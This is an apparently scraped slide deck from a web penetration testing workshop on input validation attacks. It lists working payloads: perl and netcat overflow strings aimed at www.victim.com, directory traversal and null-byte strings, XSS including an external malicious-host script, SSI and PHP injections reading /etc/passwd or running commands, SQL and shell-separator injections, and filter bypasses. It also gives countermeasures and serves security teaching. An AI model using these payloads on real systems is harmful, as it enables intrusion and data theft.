Input validation slides of web application workshop

INPUT VALIDATION
Mohsen ahmadi
Web appliation penetration testing worksop - Mohsen ahmadi _ 2014-2015

INPUTVALIDATION ATTACKS
 submit data which the application does not expect to receive
 Sanity check?
 tries to ensure that the data is useful
 Validation routines?
 Length check
 Content check
 Checksum
 How to figure out all of validation checks in an application?
 How to do all of validation checks in an application?

CLIENT-SIDEVS. SERVER-SIDE
 Why JavaScript?
 simple to implement
 widely supported betweenWeb browsers
 move a lot of processing from theWeb server to the end-user’s system
 Defeats?
 What if disable JavaScript?
 Using proxy on local

INPUTVALIDATIONTYPES
 Unexpected Input
 SQL formatting characters
 cross-site scripting attacks
 Characters produce informational errors
 Command Execution Characters
 Insert Boolean operations, semicolon
 SQL statements
 Insert JavaScript
 Buffer overflows

EFFECTS
 Generating Informational Error
 SQL errors reveals table, column names
 Directory path disclosure
 ObtainingArbitrary DataAccess
 Enumerating, creating, deleting users with anonymous
 ObtainingArbitrary Command Execution
 SQL injection attacks
 System commands like listing directories, coping files
 Cross-Site or Embedded Scripting
 Target users than web server, application

FIND POTENTIALTARGETS
 Every GET, POST request is fodder for input validation attacks
 What is attack vector?
 Altering arguments from FORM request, application itself
 Most prone to attack input fields?
 Login Name, Password,Address, Phone Number, Credit Card Number, and Search
 Every variable in the GET or POST request can be attacked

BYPASSING CLIENT-SIDEVALIDATION
 Why using JavaScript?
 Put dynamic content to pages
 Input validation
 Bypass JavaScript using:
 Local proxy likeAchilles, Paros, burp suite
 Firewall
 Pop-up blocker add-ons
 Cookie manager

COMMON INPUTVALIDATION ATTACKS
 Buffer Overflow
 Canonicalization
 Putting the Dot toWork
 NavigatingWithout Directory Listings
 Script attacks
 Cross-Site Scripting (XSS)
 Embedded Sripts
 Cookies and Predefined Headers
 Boundary Checking
 Manipulating theApplication
 Search Engines
 SQL Injection and Datastore Attacks
 Command Execution

BUFFER OVERFLOW
 Create payload for attack:
 Perl –e ‘print “a” x 50’
 Use Perl, netcat
 wrap the Perl line in back ticks and replace the argument
 echo –e "GET /login.php?user=`perl –e 'print "a" x 500'`nHTTP/1.0nn" | nc –vv
www.victim.com 80
 For HTTPS
 curl https://www.victim.com/login.php?user=`perl –e 'print "a" x 500'`

NTOMAX
 Script Format
 host:192.168.0.1,22,100,500,4000,250,0,2,true,true,true,false
 lc:GET /login.php?user=* HTTP/1.0
 Host: IP, port, min, max, timeout, delay, pause, retnum, reopen, norecv, verbose, trial
 Loop command: each instance of an asterisk replaces with a string of 400*‘N’
 ntomax /s < script.txt > results.txt

DEEP ANALYSIS OF FEATURES
 Additional host parameters:
 timeout - ms to wait for socket response - default = 0
 delay - ms to wait before sending commands - default = 250
 pause - ms to wait before receiving - default = 0
 retnum - number of LF/CR's to end buffer - default is one
 reopen -T/F reopen connection before each command
 norecv -T/F no receive after initial connect - default is off
 verbose -T/F verbose output - off by default
 trial -T/F display buffer w/o sending

CANONICALIZATION (DOT-DOT-SLASH)
 Attack vector:
 access system files outside of theWeb document root
 When attack happen?
 Parse file from server
 Using template files
 How escape document root directory?
 ../../../../../../../../../boot.ini
 salvation?
 limit the types of files that it is supposed to view

PUTTINGTHE DOTTO WORK
 Suppose an application is parsing file contents
 what happens if we rename the file to something that we know does not exist?
 full installation path of the application used in directory traversal attacks
 Null byte character
 /servlet/webacc?user.html=gor-gor
 File does not exist: c:Novelljavaservletscomnovellwebaccesstemplates/gor-
gor/login.htt
 /servlet/webacc?user.html=../../../../../../../boot.ini%00
 %00 ~ URL encoded null byte character

NAVIGATINGWITHOUT DIRECTORY LISTINGS
 explore the terrain without a map!
 The first step is to find out where the actual directory root begins
 enumerating files on IIS
 By default;Topmost directory is inetpub
 Adding directory traversal to /inetpub/wwwroot/default.asp
 ../../../../../../../../../../??
 Find other directories on server by failure and success

STEPSTO ENUMERATING
 Examine error codes: 404/ 403
 Find the root: drive letter, root
 Move down theWeb document root
 Find common directories: /tmp, /temp, /backups, /downloads
 Try to access directory names: use listed directory contents
 For improving success in directory traversal attacks you should know about
configurations, directories

COUNTERMEASURES & MITIGATIONS
 Remove all dots from user-input, parameters
 Catch other representations of dots (0x2e) from parser engine
 Remove path information using regular expression
 Secure file system permissions, ACL
 Limit server access to file, folders behind web root directory
 Place configuration files behind document root directory

SCRIPT ATTACKS
 include any HTML-formatted strings to an application that subsequently renders
those tags
1. User entering <script> tags into a form field
2. user-submitted contents of that field are redisplayed
3. Interpreting tag as JavaScript directive rather than literal value
Two prerequisites:
the application must accept user input
the application must redisplay the user input

COUNTERMEASURE
 Handling angle brackets using HTML encoded values
 User searches for <i>test</i> in search bar
 At vulnerable scenario:
 <b><i>test</i></b>
 At secure scenario:
 <b><i>test</i></b>

XSS (CROSS SITE SCRIPTING)
 place malicious code, usually JavaScript, in locations where other users see it
 Common scenarios:
Steals cookies: allow the attacker to impersonate the victim
social engineering attack: trick the victim into divulging his or her password
 Test for XSS:
 <script>document.write(document.cookie)</script>
 <script>alert('Salut!')</script>
 <script src="http://www.malicious-host.foo/badscript.js"></script>

EMBEDDED SCRIPTS
 Server-side scripts target application itself rather users
 Types of embedded scripting attacks:
 SSI directives
 PHP, ASP brackets
 SQL queries
 Affects of attacks:
 <%= date() %>
 <!—include virtual=“global.asa” 
 <!—include file=“/etc/passwd” 
 <!—exec cmd=“/sbin/ifconfig -a” 
 <% java.util.date today=new java.util.date(); out.println(today); %>
 <? Include ‘/etc/p/asswd’ ?>
 <? Passthru(“id”); ?>

COUNTERMEASURE
 turn all angle brackets into their HTML-encoded equivalents
 < ~ <
 > ~ >
 <script>
 Limit input fields to the minimum possible
 Inclusive regular expression than exclusive
 <scrscriptipt>: bypass for replacing with null regex
 <scr%69pt>
 <ScRiPt>
 <a href=“javascript:code”></a>
 Check for presence of a positive is better rather than absence of a negatives

BOUNDARY CHECKING
 Generate informational errors by swapping out the boundaries
 errors they generate can reveal useful information about the application or the
server; but you can’t get command execution
 Checklist for vulnerability:
 Boolean
 String
 Numeric

MANIPULATINGTHE APPLICATION
 Special directives
 Debug=1: reveals more informational errors about back-end DBMS
 %3f.jsp: directory listing in apache tomcat 3.2.x, Jrun
 ?openDocument ~ ?editDocument: Lotus domino servers
 Htsearch CGI: -c command-line argument reading configuration file

SQL INJECTION AND DATA STORE ATTACKS
 Or+1=1
 Single quote, tick mark, apostrophes
 Error might you see during injection test:
 You have an error in your SQL syntax
 many SQL injection tests will reveal errors in files that do not access databases

COMMAND EXECUTION
 Run arbitrary commands on server
 Types of bypassing execution flow on shell
 %0a ~ new line character: analyze.sh?%0a/bin/ls%0a
 Check for arbitrary variables can passed to server: analyze.sh?-h
 %7c ~ pipe: chain UNIX commands on shell
 %3b ~ semicolon: separate commands on single command line
 %26 ~ ampersand: delimiter for arguments on the URL
 Know your environment in command execution attacks

COUNTERMEASURES
 Server-Side InputValidation
 Character Encoding
 Regular Expressions
 Strong DataTyping
 Proper Error Handling
 Require Authentication
 Use Least-Privilege Access

TOPVECTORS FOR INPUTVALIDATION
 Each argument of a GET request
 Each argument of a POST request
 Forms (e-mail address, home address, name, comments)
 Search fields
 Cookie values
 Browser environment values (User agent, IP address, Operating System, etc.)

Input validation slides of web application workshop

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Input validation slides of web application workshop

Similar to Input validation slides of web application workshop (20)

Recently uploaded

Recently uploaded (20)

Input validation slides of web application workshop